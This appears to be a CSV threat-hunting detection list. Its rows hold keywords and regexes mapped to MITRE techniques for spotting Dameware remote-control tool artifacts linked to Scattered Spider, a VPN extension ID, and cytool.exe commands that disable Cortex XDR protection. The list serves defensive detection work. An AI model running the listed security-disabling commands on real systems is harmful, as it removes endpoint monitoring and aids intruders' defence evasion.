"*cytool.exe protect disable*",".{0,1000}cytool\.exe\sprotect\sdisable.{0,1000}","greyware_tool_keyword","cytool","Disables protection on Cortex XDR files processes registry and services","T1562.001 - T1547.001 - T1055.001","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A"
"*cytool.exe runtime disable*",".{0,1000}cytool\.exe\sruntime\sdisable.{0,1000}","greyware_tool_keyword","cytool","Disables Cortex XDR (Even with tamper protection enabled)","T1562.001 - T1547.001 - T1055.001","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A"
"*cytool.exe startup disable*",".{0,1000}cytool\.exe\sstartup\sdisable.{0,1000}","greyware_tool_keyword","cytool","Disables the cortex agent on startup","T1562.001 - T1547.001 - T1055.001","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A"
"*namfblliamklmeodpcelkokjbffgmeoo*",".{0,1000}namfblliamklmeodpcelkokjbffgmeoo.{0,1000}","greyware_tool_keyword","Daily VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"* /monitor /from_service /cpu_memory_refresh * /disk_space_refresh * /proc_list_refresh * /semkey *",".{0,1000}\s\/monitor\s\/from_service\s\/cpu_memory_refresh\s.{0,1000}\s\/disk_space_refresh\s.{0,1000}\s\/proc_list_refresh\s.{0,1000}\s\/semkey\s.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* /r /proxy  /proxyport  /proxyusername  /proxypasswd *",".{0,1000}\s\/r\s\/proxy\s\s\/proxyport\s\s\/proxyusername\s\s\/proxypasswd\s.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* /register  /proxy  /proxyport  /proxyusername  /proxypasswd*",".{0,1000}\s\/register\s\s\/proxy\s\s\/proxyport\s\s\/proxyusername\s\s\/proxypasswd.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* -a tcrmtshellagentmodule_*",".{0,1000}\s\-a\stcrmtshellagentmodule_.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","Dameware Remote Support","10","10","N/A","N/A","N/A","N/A"
"* Dameware Mini Remote Control x64 -- Installation completed successfully*",".{0,1000}\sDameware\sMini\sRemote\sControl\sx64\s\-\-\sInstallation\scompleted\ssuccessfully.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","Dameware Remote Support","10","10","N/A","N/A","N/A","N/A"
"* -log-level trace -dre -log-path *",".{0,1000}\s\-log\-level\strace\s\-dre\s\-log\-path\s.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","Dameware Remote Support","10","10","N/A","N/A","N/A","N/A"
"* tkc_agent_dre.deb*",".{0,1000}\stkc_agent_dre\.deb.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*.exe --pn dre_video_uploader --logpath logs*",".{0,1000}\.exe\s\-\-pn\sdre_video_uploader\s\-\-logpath\slogs.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*.mspa.n-able.com*",".{0,1000}\.mspa\.n\-able\.com.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/damewareagent.exe*",".{0,1000}\/damewareagent\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/DWMRC_St_64.msi*",".{0,1000}\/DWMRC_St_64\.msi.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","1","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*/DWRCC.exe*",".{0,1000}\/DWRCC\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","1","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*/DWRCCMD.exe*",".{0,1000}\/DWRCCMD\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","1","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*/DWRCS.exe*",".{0,1000}\/DWRCS\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","1","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*/SolarWinds-Dameware-DRS-St.exe*",".{0,1000}\/SolarWinds\-Dameware\-DRS\-St\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","1","N/A","Dameware Remote Support","10","10","N/A","N/A","N/A","N/A"
"*/tkc_agent_dre.deb*",".{0,1000}\/tkc_agent_dre\.deb.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\appdata\local\damewa~1\*",".{0,1000}\\appdata\\local\\damewa\~1\\.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\appdata\local\dameware remote everywhere*",".{0,1000}\\appdata\\local\\dameware\sremote\severywhere.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\appdata\local\microsoft\windows\inetcache\ie\can_install_pc[1].xml*",".{0,1000}\\appdata\\local\\microsoft\\windows\\inetcache\\ie\\can_install_pc\[1\]\.xml.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\AppData\Roaming\DameWare Development\*",".{0,1000}\\AppData\\Roaming\\DameWare\sDevelopment\\.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\baconsoleapp.exe*",".{0,1000}\\baconsoleapp\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\baconsoleappen.dll*",".{0,1000}\\baconsoleappen\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\baseclient.exe* -consoleinstallcomplete*",".{0,1000}\\baseclient\.exe.{0,1000}\s\-consoleinstallcomplete.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\basupclphlp.exe*",".{0,1000}\\basupclphlp\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\basupclpprg.exe*",".{0,1000}\\basupclpprg\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\basupconhelper.exe*",".{0,1000}\\basupconhelper\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\basuplib.dll*",".{0,1000}\\basuplib\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\basupportexpresssrvcupdater_dameware*",".{0,1000}\\basupportexpresssrvcupdater_dameware.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\basupportexpressstandaloneservice_dameware*",".{0,1000}\\basupportexpressstandaloneservice_dameware.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\basupregedithlpr.exe*",".{0,1000}\\basupregedithlpr\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\basupregedithlpr_*.log*",".{0,1000}\\basupregedithlpr_.{0,1000}\.log.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\basupsrvc.cfg*",".{0,1000}\\basupsrvc\.cfg.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\basupsrvc.exe*",".{0,1000}\\basupsrvc\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\basupsrvc.ico*",".{0,1000}\\basupsrvc\.ico.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\basupsrvc.ini*",".{0,1000}\\basupsrvc\.ini.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\basupsrvc.xml*",".{0,1000}\\basupsrvc\.xml.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\basupsrvc_*.log*",".{0,1000}\\basupsrvc_.{0,1000}\.log.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\basupsrvccnfg.exe*",".{0,1000}\\basupsrvccnfg\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\basupsrvccnfg_*.log*",".{0,1000}\\basupsrvccnfg_.{0,1000}\.log.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\basupsrvccnfg_dameware*",".{0,1000}\\basupsrvccnfg_dameware.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\basupsrvccnfgde.dll*",".{0,1000}\\basupsrvccnfgde\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\basupsrvccnfgen.dll*",".{0,1000}\\basupsrvccnfgen\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\basupsrvccnfges.dll*",".{0,1000}\\basupsrvccnfges\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\basupsrvccnfgfr.dll*",".{0,1000}\\basupsrvccnfgfr\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\basupsrvccnfgit.dll*",".{0,1000}\\basupsrvccnfgit\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\basupsrvccnfgpt.dll*",".{0,1000}\\basupsrvccnfgpt\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\basupsrvcde.dll*",".{0,1000}\\basupsrvcde\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\basupsrvcen.dll*",".{0,1000}\\basupsrvcen\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\basupsrvces.dll*",".{0,1000}\\basupsrvces\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\basupsrvcevnt3.dll*",".{0,1000}\\basupsrvcevnt3\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\basupsrvcfr.dll*",".{0,1000}\\basupsrvcfr\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\basupsrvcit.dll*",".{0,1000}\\basupsrvcit\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\basupsrvcpt.dll*",".{0,1000}\\basupsrvcpt\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\basupsrvcupdater.exe*",".{0,1000}\\basupsrvcupdater\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\basupsrvcupdater_*.log*",".{0,1000}\\basupsrvcupdater_.{0,1000}\.log.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\basupsysinf*.log*",".{0,1000}\\basupsysinf.{0,1000}\.log.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\basupsysinf.exe*",".{0,1000}\\basupsysinf\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\basupsysinf.ini*",".{0,1000}\\basupsysinf\.ini.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\basupsysshell.exe*",".{0,1000}\\basupsysshell\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\basupsysshell64.exe*",".{0,1000}\\basupsysshell64\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\basuptshelper.exe*",".{0,1000}\\basuptshelper\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\basuptshelper_*.log*",".{0,1000}\\basuptshelper_.{0,1000}\.log.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\basuptshelperlib.dll*",".{0,1000}\\basuptshelperlib\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\basupunelev.exe*",".{0,1000}\\basupunelev\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\basupvista.dll*",".{0,1000}\\basupvista\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\bavideochat.exe*",".{0,1000}\\bavideochat\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\bawhook.dll*",".{0,1000}\\bawhook\.dll.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\beanywhere support express service - [dameware]*",".{0,1000}\\beanywhere\ssupport\sexpress\sservice\s\-\s\[dameware\].{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\currentversion\uninstall\dameware remote everywhere*",".{0,1000}\\currentversion\\uninstall\\dameware\sremote\severywhere.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\DameWare Development\MrcVerbLog*",".{0,1000}\\DameWare\sDevelopment\\MrcVerbLog.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\Dameware Mini Remote Control x64\*",".{0,1000}\\Dameware\sMini\sRemote\sControl\sx64\\.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\dameware mini remote control x64\*",".{0,1000}\\dameware\smini\sremote\scontrol\sx64\\.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
"*\DameWare Mini Remote Control*.exe*",".{0,1000}\\DameWare\sMini\sRemote\sControl.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","Dameware Remote Support","10","10","N/A","N/A","N/A","N/A"
"*\Dameware Mini Remote Control.lnk*",".{0,1000}\\Dameware\sMini\sRemote\sControl\.lnk.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A"
